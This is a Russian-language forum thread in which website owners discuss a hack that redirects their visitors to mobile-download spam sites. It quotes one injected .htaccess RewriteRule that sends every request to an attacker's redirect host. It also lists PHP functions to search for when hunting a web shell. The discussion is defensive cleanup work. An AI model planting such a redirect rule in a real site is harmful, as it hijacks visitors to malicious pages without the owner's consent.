заметил, что идет переадресациия на другой сайт _ww.mobi-loads...
То есть все идет вот так:
1.Я набираю в адресной строке мойсайт.ru
2. Он переадресовывает на mobi-loads
3. После он уже ведет на zmoby
что это ?
и как решить проблему?
burbon.ru/service/virus.php
Вроде как проверка сайта на вирусы, я думаю ничего страшного не произойдет если провериш.Ты чо вирусняк поймал?
этим стоит пользоваться ?
burbon.ru/service/virus.php
RewriteRule ^(.*)$ http://сайт-взломщика.ru/tds?r=4069&l=11 [L,R=302]
а что это я не понялОднако среди Ваших файлов также с большой вероятностью находится веб-шелл, поэтому рекомендуем произвести поиск по файлам по описанным в нашей Помощи функциям, а также по create_function, headers_sent и preg_match с флагом e.
произвести поиск по файлам… по create_function, headers_sent и preg_match с флагом e.
Такая же проблема (версия 1.8), как у lezginka.ru.
Зачистила htaccess, но шелл так и не нашла.
Сегодня обнаружила, что вчера опять пытались залить код и картинку. Один код нашла в template, который запрашивает USER_AGENT. Картинку загрузить у вредителя не получилось, то есть есть файл upload/117.jpg, но с 0 размером. Разбираюсь дальше.
Буду рада Вашим рекомендациям по поиску шелла на сайте.
правда частично решил.
оказалось, что в .htaccess эти козлы свой код прописали.
подозреваю, что они к сайту доступ имеют(шелл- что это я сам не знаю)
надо анализировать логи + проглядеть свежие файлы по фтп.